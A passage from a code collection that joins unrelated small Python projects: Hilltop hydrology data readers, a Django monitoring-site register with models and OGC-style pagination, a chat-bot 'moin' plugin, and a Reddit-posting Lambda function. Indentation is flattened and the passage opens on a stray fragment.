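assert sys.maxsize - newer == 1_700_000_000   # timestamp recovered as in run_task
```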
|
{
"source": "jeffchen81/stock-starer",
"score": 3
}
|
#### File: jeffchen81/stock-starer/main.py
```python
from bottle import route, run, template
@route('/hello/<name>')
def index(name):
return template('<b>Hello {{name}}</b>!', name=name)
run(host='localhost', port=8080)
# def main():
# '''
# 主函数
# '''
# pass
# if __name__ == "__main__":
# main()
```
|
{
"source": "jeffcnz/hilltop-py",
"score": 3
}
|
#### File: hilltop-py/hilltoppy/com.py
```python
try:
from win32com.client import Dispatch, pywintypes, makepy
except ImportError:
print('Install pywin32 or the COM functions will not work')
from pandas import concat, to_datetime, to_numeric, DataFrame, merge
from hilltoppy.util import pytime_to_datetime, time_switch
######################################################
#### COM access method
def makepy_hilltop(hlib='Hilltop Data Access'):
"""
Function to generate the Hilltop COM module.
Parameters
----------
hlib : str
The name of the COM library.
Returns
-------
None
"""
makepy.GenerateFromTypeLibSpec(hlib, verboseLevel=1)
def measurement_list(hts, sites=None, mtypes=None, rem_wq_sample=True):
"""
Function to read the site names, measurement types, and units of a Hilltop hts file. Returns a DataFrame.
Parameters
----------
hts : str
Path to the hts file.
sites : list or None
A list of site names within the hts file.
mtypes : list or None
A list of measurement types that should be returned.
rem_wq_sample : bool
In Hilltop 'WQ Sample' is a measurement type placemarker for the additional sample data. It doesn't generally apply when querying for the combo of sites/measurement types. True removes this instance from the returned DataFrame.
Returns
-------
DataFrame
"""
cat = Dispatch("Hilltop.Catalogue")
if not cat.Open(hts):
raise ValueError(cat.errmsg)
dfile = Dispatch("Hilltop.DataRetrieval")
try:
dfile.Open(hts)
except ValueError:
print(dfile.errmsg)
sites_lst = []
### Iterate through all sites/datasources/mtypes
cat.StartSiteEnum
while cat.GetNextSite:
site_name = str(cat.SiteName.encode('ascii', 'ignore').decode())
if sites is None:
pass
elif site_name in sites:
pass
else:
continue
while cat.GetNextDataSource:
ds_name = str(cat.DataSource.encode('ascii', 'ignore').decode())
try:
start1 = pytime_to_datetime(cat.DataStartTime)
end1 = pytime_to_datetime(cat.DataEndTime)
except ValueError:
bool_site = dfile.FromSite(site_name, ds_name, 1)
if bool_site:
start1 = pytime_to_datetime(cat.DataStartTime)
end1 = pytime_to_datetime(cat.DataEndTime)
else:
print('No site data for ' + site_name + '...for some reason...')
while cat.GetNextMeasurement:
mtype1 = str(cat.Measurement.encode('ascii', 'ignore').decode())
if mtype1 == 'Item2':
continue
elif mtypes is None:
pass
elif mtype1 in mtypes:
pass
else:
continue
divisor = cat.Divisor
unit1 = str(cat.Units.encode('ascii', 'ignore').decode())
if unit1 == '%':
# print('Site ' + name1 + ' has no units')
unit1 = ''
sites_lst.append([site_name, ds_name, mtype1, unit1, divisor, str(start1), str(end1)])
sites_df = DataFrame(sites_lst, columns=['site', 'data_source', 'mtype', 'unit', 'divisor', 'start_date', 'end_date'])
if rem_wq_sample:
sites_df = sites_df[~(sites_df.mtype == 'WQ Sample')]
dfile.Close()
cat.Close()
return sites_df
def get_data_quantity(hts, sites=None, mtypes=None, start=None, end=None, agg_period=None, agg_n=1, fun=None, output_site_data=False, exclude_mtype=None, sites_df=None):
"""
Function to read water quantity data from an hts file.
Parameters
----------
hts : str
Path to the hts file.
sites : list
A list of site names within the hts file.
mtypes : list
A list of measurement types that should be returned.
start : str
The start date to retrieve from the data in ISO format (e.g. '2011-11-30 00:00').
end : str
The end date to retrieve from the data in ISO format (e.g. '2011-11-30 00:00').
agg_period : str
The resample period (e.g. 'day', 'month').
agg_n : int
The number of periods (e.g. 1 for 1 day).
fun : str
The resampling function.
output_site_data : bool
Should the sites data be output?
sites_df : DataFrame
The DataFrame returned from the rd_hilltop_sites function. If this is passed then rd_hilltop_sites is not run.
Returns
-------
DataFrame
"""
agg_name_dict = {'sum': 4, 'count': 5, 'mean': 1}
agg_unit_dict = {'l/s': 1, 'm3/s': 1, 'm3/hour': 1, 'mm': 1, 'm3': 4}
unit_convert = {'l/s': 0.001, 'm3/s': 1, 'm3/hour': 1, 'mm': 1, 'm3': 1}
### First read all of the sites in the hts file and select the ones to be read
if not isinstance(sites_df, DataFrame):
sites_df = measurement_list(hts, sites=sites, mtypes=mtypes)
sites_df = sites_df[sites_df.unit.isin(list(agg_unit_dict.keys()))]
if isinstance(exclude_mtype, list):
sites_df = sites_df[~sites_df.mtype.isin(exclude_mtype)]
### Select out the sites/mtypes within the date range
if isinstance(start, str):
sites_df = sites_df[sites_df.end_date >= start]
if isinstance(end, str):
sites_df = sites_df[sites_df.start_date <= end]
### Open the hts file
dfile = Dispatch("Hilltop.DataRetrieval")
try:
dfile.Open(hts)
except ValueError:
print(dfile.errmsg)
### Iterate through the hts file
df_lst = []
for i in sites_df.index:
site = sites_df.loc[i, 'site']
mtype = sites_df.loc[i, 'mtype']
unit = sites_df.loc[i, 'unit']
if fun is None:
agg_val = agg_unit_dict[unit]
else:
agg_val = agg_name_dict[fun]
if dfile.FromSite(site, mtype, 1):
## Set up start and end times and aggregation initiation
start_time = pytime_to_datetime(dfile.DataStartTime)
end_time = pytime_to_datetime(dfile.DataEndTime)
if (start_time.year < 1900) | (end_time.year < 1900):
print('Site ' + site + ' has a start or end time prior to 1900')
continue
if (start is None):
if (agg_period is not None):
start1 = str(to_datetime(start_time).ceil(str(agg_n) + time_switch(agg_period)))
else:
start1 = dfile.DataStartTime
else:
start1 = start
if end is None:
end1 = dfile.DataEndTime
else:
end1 = end
if not dfile.FromTimeRange(start1, end1):
continue
if (agg_period is not None):
dfile.SetMode(agg_val, str(agg_n) + ' ' + agg_period)
## Extract data
data = []
time = []
if dfile.getsinglevbs == 0:
t1 = dfile.value
if isinstance(t1, str):
print('site ' + site + ' has nonsense data')
else:
data.append(t1)
time.append(str(pytime_to_datetime(dfile.time)))
while dfile.getsinglevbs != 2:
data.append(dfile.value)
time.append(str(pytime_to_datetime(dfile.time)))
if data:
df_temp = DataFrame({'time': time, 'data': data, 'site': site, 'mtype': mtype})
df_lst.append(df_temp)
dfile.Close()
if df_lst:
df1 = concat(df_lst)
df1.loc[:, 'time'] = to_datetime(df1.loc[:, 'time'])
df2 = df1.set_index(['mtype', 'site', 'time']).data * unit_convert[unit]
else:
df2 = DataFrame([], index=['mtype', 'site', 'time'])
if output_site_data:
return df2, sites_df
else:
return df2
def get_data_quality(hts, sites=None, mtypes=None, start=None, end=None, dtl_method=None, output_site_data=False, mtype_params=None, sample_params=None, sites_df=None):
"""
Function to read water quality data from an hts file.
Parameters
----------
hts : str
Path to the hts file.
sites : list
A list of site names within the hts file.
mtypes : list
A list of measurement types that should be returned.
start : str
The start date to retrieve from the data in ISO format (e.g. '2011-11-30 00:00').
end : str
The end date to retrieve from the data in ISO format (e.g. '2011-11-30 00:00').
dtl_method : None, 'standard', 'trend'
The method to use to convert values under a detection limit to numeric. None does no conversion. 'standard' takes half of the detection limit. 'trend' is meant as an output for trend analysis with includes an additional column dtl_ratio referring to the ratio of values under the detection limit.
output_site_data : bool
Should the site data be output?
sites_df : DataFrame
The DataFrame returned from the rd_hilltop_sites function. If this is passed then rd_hilltop_sites is not run.
Returns
-------
DataFrame
"""
### First read all of the sites in the hts file and select the ones to be read
if not isinstance(sites_df, DataFrame):
sites_df = measurement_list(hts, sites=sites, mtypes=mtypes, rem_wq_sample=False)
### Select out the sites/mtypes within the date range
if isinstance(start, str):
sites_df = sites_df[sites_df.end_date >= start]
if isinstance(end, str):
sites_df = sites_df[sites_df.start_date <= end]
### Open the hts file
wqr = Dispatch("Hilltop.WQRetrieval")
dfile = Dispatch("Hilltop.DataFile")
try:
dfile.Open(hts)
except ValueError:
print(dfile.errmsg)
### Iterate through the hts file
df_lst = []
for i in sites_df.index:
site_data = sites_df.loc[i]
site = site_data['site']
mtype = site_data['mtype']
if mtype == 'WQ Sample':
continue
wqr = dfile.FromWQSite(site, mtype)
## Set up start and end times and aggregation initiation
if start is None:
start1 = wqr.DataStartTime
else:
start1 = pywintypes.TimeType.strptime(start, '%Y-%m-%d')
if end is None:
end1 = wqr.DataEndTime
else:
end1 = pywintypes.TimeType.strptime(end, '%Y-%m-%d')
if not wqr.FromTimeRange(start1, end1):
continue
## Extract data
data = []
time = []
sample_p = []
test_params = sites_df[sites_df.site == site].mtype.unique()
if ('WQ Sample' in test_params) & (isinstance(mtype_params, list) | isinstance(sample_params, list)):
mtype_p = []
while wqr.GetNext:
data.append(str(wqr.value.encode('ascii', 'ignore').decode()))
time.append(str(pytime_to_datetime(wqr.time)))
sample_p.append({sp: str(wqr.params(sp).encode('ascii', 'ignore').decode()) for sp in sample_params})
mtype_p.append({mp: str(wqr.params(mp).encode('ascii', 'ignore').decode()) for mp in mtype_params})
else:
while wqr.GetNext:
data.append(str(wqr.value.encode('ascii', 'ignore').decode()))
time.append(str(pytime_to_datetime(wqr.time)))
if data:
df_temp = DataFrame({'time': time, 'data': data, 'site': site, 'mtype': mtype})
if sample_p:
df_temp = concat([df_temp, DataFrame(sample_p), DataFrame(mtype_p)], axis=1)
df_lst.append(df_temp)
dfile.Close()
wqr.close()
if df_lst:
data = concat(df_lst)
data.loc[:, 'time'] = to_datetime(data.loc[:, 'time'])
data1 = to_numeric(data.loc[:, 'data'], errors='coerce')
data.loc[data1.notnull(), 'data'] = data1[data1.notnull()]
data = data.reset_index(drop=True)
#### Convert detection limit values
if dtl_method is not None:
less1 = data['data'].str.match('<')
if less1.sum() > 0:
less1.loc[less1.isnull()] = False
data2 = data.copy()
data2.loc[less1, 'data'] = to_numeric(data.loc[less1, 'data'].str.replace('<', ''), errors='coerce') * 0.5
if dtl_method == 'standard':
data3 = data2
if dtl_method == 'trend':
df1 = data2.loc[less1]
count1 = data.groupby('mtype')['data'].count()
count1.name = 'tot_count'
count_dtl = df1.groupby('mtype')['data'].count()
count_dtl.name = 'dtl_count'
count_dtl_val = df1.groupby('mtype')['data'].nunique()
count_dtl_val.name = 'dtl_val_count'
combo1 = concat([count1, count_dtl, count_dtl_val], axis=1, join='inner')
combo1['dtl_ratio'] = (combo1['dtl_count'] / combo1['tot_count']).round(2)
## conditionals
param2 = combo1[(combo1['dtl_ratio'] > 0.4) & (combo1['dtl_val_count'] != 1)]
over_40 = data['mtype'].isin(param2.index)
## Calc detection limit values
data3 = merge(data, combo1['dtl_ratio'].reset_index(), on='mtype', how='left')
data3.loc[:, 'data_dtl'] = data2['data']
max_dtl_val = data2[over_40 & less1].groupby('mtype')['data'].transform('max')
max_dtl_val.name = 'dtl_data_max'
data3.loc[over_40 & less1, 'data_dtl'] = max_dtl_val
else:
data3 = data
else:
data3 = data
if output_site_data:
sites_df = sites_df[~(sites_df.mtype == 'WQ Sample')]
return data3, sites_df
else:
return data3
def write_wq_data(hts, data):
"""
Function to write water quality data to Hilltop hts files.
Parameters
------------
hts : str
Path to the hts file to write to.
data : dict
A dictionary of the data in the following example structure
{'SQ00001': {'2000-01-01 12:00:00': {'SiteParameter':
{'Sample ID': '174759302',
'Project': 'BPStreams'
}
'Measurement':
{'Conductivity (Field)':
{'Value': '18.59',
'MethodText': 'Unknown meter',
'Lab': 'Field'
}
}
}
}
}
Returns
-------
None
"""
for s in data:
print(s)
dfile = Dispatch("Hilltop.WQInput")
try:
dfile.Open(hts)
except ValueError:
print(dfile.ErrorMsg)
for d in data[s]:
# print(d)
q1 = data[s][d]
dfile.PutSample(s, d) # Initialize the site and time
if 'SiteParameter' in q1:
sp4 = q1['SiteParameter']
for key, val in sp4.items():
dfile.SetParam(key, val) # set the sample parameters, not associated with measurement types
if 'Measurement' in q1:
m1 = q1['Measurement']
for key, val in m1.items():
dup = val.copy()
dfile.PutMeasurement(key, dup.pop('Value')) # Set a measurement value
if dup:
for mp, mpval in dup.items():
dfile.SetParam(mp, mpval) # sample parameters associated with the measurement parameter
if len(dfile.ErrorMsg) > 0:
raise ValueError(dfile.ErrorMsg)
else:
dfile.Close() # commit data to the hts file
```
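A minimal usage sketch of the COM readers above. This only works on Windows with pywin32 and the Hilltop libraries registered; the hts path, site name, and measurement type below are placeholders, not values from this repository.

```python
# Hedged sketch: list available measurements, then pull daily-mean quantity data.
from hilltoppy.com import measurement_list, get_data_quantity

hts = r'C:\Hilltop\Data\example.hts'  # hypothetical file path

sites_df = measurement_list(hts)      # columns: site, data_source, mtype, unit, ...
flow = get_data_quantity(
    hts,
    sites=['Example Site'],           # placeholder site name
    mtypes=['Flow'],                  # placeholder measurement type
    start='2019-01-01 00:00',
    end='2019-12-31 00:00',
    agg_period='day', agg_n=1, fun='mean',
)
print(sites_df.head())
print(flow.head())
```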
|
{
"source": "jeffcnz/mon-site-register",
"score": 2
}
|
#### File: mon-site-register/mon-site-register/settings.py
```python
import json
import os
from django.core.exceptions import ImproperlyConfigured
#import dj_database_url
import django_heroku
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Import 'secret' info
if (os.path.isfile(os.path.join(BASE_DIR, 'secrets.json'))):
with open(os.path.join(BASE_DIR, 'secrets.json')) as secrets_file:
secrets = json.load(secrets_file)
else:
secrets = {
"SECRET_KEY": "default",
"USER": "user",
"DB_PASSWORD": "<PASSWORD>"
}
def get_secret(setting, secrets=secrets):
"""Get secret setting or fail with ImproperlyConfigured"""
try:
return secrets[setting]
except KeyError:
raise ImproperlyConfigured("Set the {} setting".format(setting))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
ALLOWED_HOSTS = []
APPEND_SLASH = False
# Application definition
INSTALLED_APPS = [
#'sites.apps.SitesConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'sites',
'leaflet',
'guardian',
'rest_framework',
'rest_framework_gis',
#'nested_admin'
#'multiforloop'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'sites.middleware.timezone.TimezoneMiddleware'
]
ROOT_URLCONF = 'mon-site-register.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mon-site-register.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# Set database depending on whether local or on Heroku
if os.environ.get('ENV') == 'HEROKU':
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'postgis'
}
}
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
else:
DATABASES = {
'default': {
# Initial SQLite database
#'ENGINE': 'django.db.backends.sqlite3',
#'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# Updated to PostGIS
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'gisdb',
'USER': get_secret('USER'),
'PASSWORD': get_secret('DB_PASSWORD'),
'HOST':'localhost',
'PORT':'5433',
}
}
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = get_secret('SECRET_KEY')
DEBUG = True
#DATABASES['default'] = dj_database_url.config()
#DATABASES['default']['ENGINE'] = 'django.contrib.gis.db.backends.postgis'
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Etc/GMT-12' #'Pacific/Auckland'
DATE_FORMAT = 'd m Y'
DATETIME_FORMAT = 'd m Y H:i:s'
USE_I18N = True
# Use Local date formatting False so can set format
USE_L10N = False
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# For Heroku
GDAL_LIBRARY_PATH = os.environ.get('GDAL_LIBRARY_PATH')
GEOS_LIBRARY_PATH = os.environ.get('GEOS_LIBRARY_PATH')
#GEOS_LIBRARY_PATH = '/app/.heroku/vendor/lib/libgeos_c.so' if os.environ.get('ENV') == 'HEROKU' else os.getenv('GEOS_LIBRARY_PATH')
#GDAL_LIBRARY_PATH = '/app/.heroku/vendor/lib/libgdal.so' if os.environ.get('ENV') == 'HEROKU' else os.getenv('GDAL_LIBRARY_PATH')
# Leaflet Configurations
LEAFLET_CONFIG = {
'DEFAULT_CENTER': (-41.2706, 173.2840),
'DEFAULT_ZOOM': 5,
'MAX_ZOOM': 20,
'MIN_ZOOM':3,
'SCALE': 'both',
'ATTRIBUTION_PREFIX': 'Inspired by Life in GIS'
}
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend', # this is default
'guardian.backends.ObjectPermissionBackend',
)
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
'DEFAULT_FILTER_BACKENDS': [
'django_filters.rest_framework.DjangoFilterBackend'
],
#'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
#'DEFAULT_RENDERER_CLASSES': [
# 'rest_framework.renderers.JSONRenderer',
# 'rest_framework.renderers.AdminRenderer',
# 'rest_framework.renderers.TemplateHTMLRenderer',
#]
}
# Configure Django App for Heroku.
django_heroku.settings(locals())
DATABASES['default']['ENGINE'] = 'django.contrib.gis.db.backends.postgis'
```
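The settings module looks for a `secrets.json` next to `BASE_DIR` and falls back to dummy values if it is missing. A small helper sketch for local development, run from the project root; the values are placeholders.

```python
# Hedged sketch: write the secrets.json that settings.py reads (run from BASE_DIR).
import json

secrets = {
    "SECRET_KEY": "replace-with-a-long-random-string",
    "USER": "gisdb_user",          # placeholder PostGIS user
    "DB_PASSWORD": "replace-me",   # placeholder password
}

with open("secrets.json", "w") as f:
    json.dump(secrets, f, indent=2)
```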
#### File: mon-site-register/sites/models.py
```python
from django.contrib.gis.db import models
#from django.dispatch import receiver
from django.contrib.auth.models import User, Group
from django.db.models.signals import post_save
from django.dispatch import receiver
#from guardian.shortcuts import assign_perm
class ApiInfo(models.Model):
title = models.CharField(max_length=200)
description = models.TextField()
def __str__(self):
return self.title
class ApiConformance(models.Model):
api_id = models.ForeignKey(ApiInfo, on_delete=models.CASCADE, default=1)
name = models.CharField(max_length=100)
url = models.URLField()
def __str__(self):
return self.name
class ApiCollections(models.Model):
id = models.CharField(max_length=100, primary_key=True)
api_id = models.ForeignKey(ApiInfo, on_delete=models.CASCADE)
title = models.CharField(max_length=200)
description = models.TextField()
def __str__(self):
return self.id
class Agency(models.Model):
agency_name = models.CharField(max_length=200, unique=True)
website = models.CharField(max_length=200)
#site_webservices = models.ForeignKey('AgencySiteListServices', null=True, blank=True, on_delete=models.CASCADE, related_name='agency_site_lists')
def __str__(self):
return self.agency_name
class IdentifierType(models.Model):
identifier_name = models.CharField(max_length=200, unique=True)
def __str__(self):
return self.identifier_name
class Site(models.Model):
site_name = models.CharField(max_length=200)
location = models.PointField('site location', null=True, blank=True, srid=4326)
description = models.CharField(max_length=500, null=True, blank=True)
identifiers = models.ManyToManyField(IdentifierType, null=True, through='SiteIdentifiers')
agencies = models.ManyToManyField(Agency, null=True, through='SiteAgency')
#operational_periods = models.ForeignKey('SiteOperation', null=True, on_delete=models.CASCADE, related_name='site_operating')
# need to add a feature of interest, but how define???
class Meta:
ordering = ['pk']
def __str__(self):
return self.site_name
class SiteAgency(models.Model):
# Check / work through the on delete actions
site = models.ForeignKey(Site, on_delete=models.CASCADE)#, related_name='site_agencies')
agency = models.ForeignKey(Agency, on_delete=models.CASCADE, null=True)#, related_name='agency_to_site')
from_date = models.DateTimeField('agency from date', null=True, blank=True)
to_date = models.DateTimeField('agency to date', null=True, blank=True)
#def __str__(self):
# return self.agency_name
class Meta:
constraints = [
models.UniqueConstraint(fields=['site', 'agency'], name='unique site agency')
]
def __str__(self):
return "%s - %s" % (self.agency.agency_name, self.site.site_name)
class ObservedProperty(models.Model):
observed_property_name = models.CharField(max_length=200, unique=True)
observed_property_url = models.CharField(max_length=400, null=True, blank=True)
def __str__(self):
return self.observed_property_name
class InterpolationType(models.Model):
interpolation_type_name = models.CharField(max_length=200, unique=True)
interpolation_type_url = models.CharField(max_length=400, null=True, blank=True)
def __str__(self):
return self.interpolation_type_name
class AgencyMeasurement(models.Model):
agency = models.ForeignKey(Agency, on_delete=models.CASCADE)
agency_measurement_name = models.CharField(max_length=200)
measurement_description = models.CharField(max_length=500, null=True, blank=True)
interpolation_type = models.ForeignKey(InterpolationType, on_delete=models.CASCADE, null=True, blank=True)
observed_property = models.ForeignKey(ObservedProperty, on_delete=models.CASCADE)
# Add units, statistics, type of measurement
class Meta:
constraints = [
models.UniqueConstraint(fields=['agency', 'agency_measurement_name'], name='unique agency measurements')
]
def __str__(self):
return "%s - %s " %(self.agency.agency_name, self.agency_measurement_name)
class SiteAgencyMeasurement(models.Model):
site_agency = models.ForeignKey(SiteAgency, on_delete=models.CASCADE)
agency_measurement = models.ForeignKey(AgencyMeasurement, on_delete=models.CASCADE)
result_url = models.CharField(max_length=400)
observed_from = models.DateTimeField('site agency measurement from date', null=True, blank=True)
observed_to = models.DateTimeField('site agency measurement to date', null=True, blank=True)
class Meta:
constraints = [
models.UniqueConstraint(fields=['site_agency', 'agency_measurement'], name='unique site agency measurement')
]
#class SiteOperation(models.Model):
# site = models.ForeignKey(Site, on_delete=models.SET_NULL, null=True)
# from_date = models.DateField('operational from date')
# to_date = models.DateField('operational to date', null=True, blank=True)
#def __str__(self):
# return self.from_date
class SiteIdentifiers(models.Model):
site = models.ForeignKey(Site, on_delete=models.CASCADE)#, related_name='site_idents') #site_to_ident_type
identifier_type = models.ForeignKey(IdentifierType, on_delete=models.CASCADE, null=True)#, related_name='site_ident') #ident_type_to_site
#identifier_type = models.OneToOneField(IdentifierType, on_delete=models.SET_NULL, related_name='ident_site', null=True) #ident_type_to_site
identifier = models.CharField(max_length=200)
class Meta:
constraints = [
models.UniqueConstraint(fields=['identifier_type', 'identifier'], name='unique other identifiers')
]
#def __str__(self):
# return self.identifier_type
#class AgencySiteListServices(models.Model):
# agency = models.ForeignKey(Agency, on_delete=models.CASCADE)
# service_type = models.ForeignKey('SiteServiceTypes', on_delete=models.CASCADE, related_name='site_service_types')
# service_url = models.CharField(max_length=250)
class SiteServiceTypes(models.Model):
service_type = models.CharField(max_length=50)
#@receiver(post_save, sender=Agency)
#def create_agency_group(sender, instance, created, **kwargs):
# if created:
# newgroup = Group.objects.create(name=instance.agency_name)
# newgroup.save()
# assign_perm('change_agency', newgroup, newgroup)
```
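A short ORM sketch of how the schema above fits together, e.g. inside `python manage.py shell`: an `Agency` and a `Site` are linked through `SiteAgency`, and alternative identifiers hang off `SiteIdentifiers`. All values are placeholders.

```python
# Hedged sketch; field values are placeholders, not data from this project.
from django.contrib.gis.geos import Point
from sites.models import Agency, Site, SiteAgency, IdentifierType, SiteIdentifiers

agency = Agency.objects.create(agency_name='Example Council', website='https://example.org')
site = Site.objects.create(
    site_name='River at Example Bridge',
    location=Point(173.2840, -41.2706, srid=4326),  # lon, lat
    description='Placeholder monitoring site',
)
SiteAgency.objects.create(site=site, agency=agency)

ident_type = IdentifierType.objects.create(identifier_name='Example ID scheme')
SiteIdentifiers.objects.create(site=site, identifier_type=ident_type, identifier='EX-00001')
```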
#### File: mon-site-register/sites/pagination.py
```python
from collections import OrderedDict
from rest_framework import pagination
from rest_framework.response import Response
class OGCFeaturesPagination(pagination.LimitOffsetPagination):
"""
A geoJSON implementation of a pagination serializer.
Modified from the Django Rest GIS GeoJsonPagination
to conform with the OGC Features specification.
"""
def get_paginated_response(self, data):
# define additional pagination links
pagination_links = [{
'href':self.get_next_link(),
'rel': 'next',
'type': 'application/geo+json',
'title': 'next page'
},
{
'href':self.get_previous_link(),
'rel': 'prev',
'type': 'application/geo+json',
'title': 'previous page'
}]
# create final links list by adding pagination links to existing
final_links = data['links'] + pagination_links
return Response(OrderedDict([
('type', 'FeatureCollection'),
('numberMatched', self.count),
('numberReturned', len(data['features'])),
('links', final_links),
('features', data['features'])
]))
```
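A sketch of how this paginator might be attached to a Django REST framework list view. The serializer is hypothetical: `get_paginated_response` expects the serialized data to already carry top-level `links` and `features` keys, so whatever serializer is used must emit a FeatureCollection of that shape.

```python
# Hedged sketch; SiteGeoSerializer is hypothetical and not part of this file.
from rest_framework import generics

from sites.models import Site
from sites.pagination import OGCFeaturesPagination
# from sites.serializers import SiteGeoSerializer  # assumed GeoJSON serializer with 'links'

class SiteFeatureList(generics.ListAPIView):
    queryset = Site.objects.all()
    # serializer_class = SiteGeoSerializer
    pagination_class = OGCFeaturesPagination
```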
|
{
"source": "jeffcorcoran/fraqbot",
"score": 2
}
|
#### File: fraqbot/Local/moin.py
```python
import logging
import os
import sys
import time
from Legobot.Lego import Lego
LOCAL_DIR = os.path.join(os.path.abspath(os.path.dirname(__file__)))
if LOCAL_DIR not in sys.path:
sys.path.append(LOCAL_DIR)
from helpers import call_rest_api # noqa #402
logger = logging.getLogger(__name__)
class Moin(Lego):
def __init__(self, baseplate, lock, *args, **kwargs):
super().__init__(baseplate, lock, acl=kwargs.get('acl'))
self.url_base = kwargs.get('url_base')
self.api_base = kwargs.get('api_base')
self.rate_map = {}
def _get_user_moin(self, user):
url = f'{self.api_base}/{user}'
f_name = call_rest_api(__name__, 'get', url, response='json')
if f_name:
return f'{self.url_base}{f_name}'
else:
return None
def _check_rate(self, source_user):
if not source_user:
return False
now = int(time.time())
last = self.rate_map.get(source_user, 0)
if now - last >= 300:
self.rate_map[source_user] = now
return True
return False
def listening_for(self, message):
return 'moin' in str(message.get('text', '')).lower()
def handle(self, message):
source_user = message.get('metadata', {}).get('source_user', '')
logger.debug(f'HANDLING MOIN for {source_user}')
check = self._check_rate(source_user)
logger.debug(f'CHECK RATE for {source_user}: {check}')
if check:
moin = self._get_user_moin(source_user)
if moin:
opts = self.build_reply_opts(message)
self.reply_attachment(message, 'moin', moin, opts=opts)
def get_name(self):
return ''
```
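`_check_rate` above throttles replies to one moin per user every 300 seconds. A standalone sketch of the same sliding-window check, outside the Lego plumbing:

```python
# Hedged sketch of the per-user rate window used by Moin._check_rate.
import time

rate_map = {}

def check_rate(user: str, window: int = 300) -> bool:
    """Return True if `user` has not triggered within the last `window` seconds."""
    now = int(time.time())
    if now - rate_map.get(user, 0) >= window:
        rate_map[user] = now
        return True
    return False

assert check_rate('alice') is True    # first call passes
assert check_rate('alice') is False   # immediate retry is throttled
```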
|
{
"source": "jeffcorpuz/wholesomify",
"score": 3
}
|
#### File: jeffcorpuz/wholesomify/lambda_function.py
```python
import json
import os
import praw
from random import randrange
env = {
'username': os.environ["REDDITNAME"],
'password': os.environ.get("PASSWORD",""), # for testing purposes, password is blank...
'id': os.environ["APPID"],
'secret': os.environ["APPSECRET"],
'app-name': os.environ["APPNAME"],
'limit': os.environ["LIMIT"],
}
reddit = praw.Reddit(client_id=env['id'],
client_secret=env['secret'],
user_agent=f"{env['app-name']} by {env['username']}",
username=env['username'],
password=env['password'],
)
def wholesomify(limit: int) -> praw.models.Submission:
# assume you have a Reddit instance bound to variable `reddit`
choice = ["wholesomememes", "aww", "EyeBleach"]
subreddit = reddit.subreddit(choice[randrange(len(choice))])
submissions = []
# populate
for submission in subreddit.hot(limit=limit):
submissions.append(submission)
return submissions[randrange(limit)]
def lambda_handler(event, context):
submission = wholesomify(int(env['limit']))
message = f"wholesome time!: {submission.url}"
return {
'statusCode': 200,
'body': json.dumps(message)
}
```
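A sketch for invoking the handler locally. The module reads its Reddit credentials from environment variables at import time, so they must be set first; every value below is a placeholder.

```python
# Hedged local-invocation sketch; all credential values are placeholders.
import os

os.environ.update({
    "REDDITNAME": "your-reddit-username",
    "PASSWORD": "your-reddit-password",
    "APPID": "your-app-id",
    "APPSECRET": "your-app-secret",
    "APPNAME": "wholesomify",
    "LIMIT": "25",
})

import lambda_function  # noqa: E402  (imported after the env vars are set)

print(lambda_function.lambda_handler({}, None))
```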
|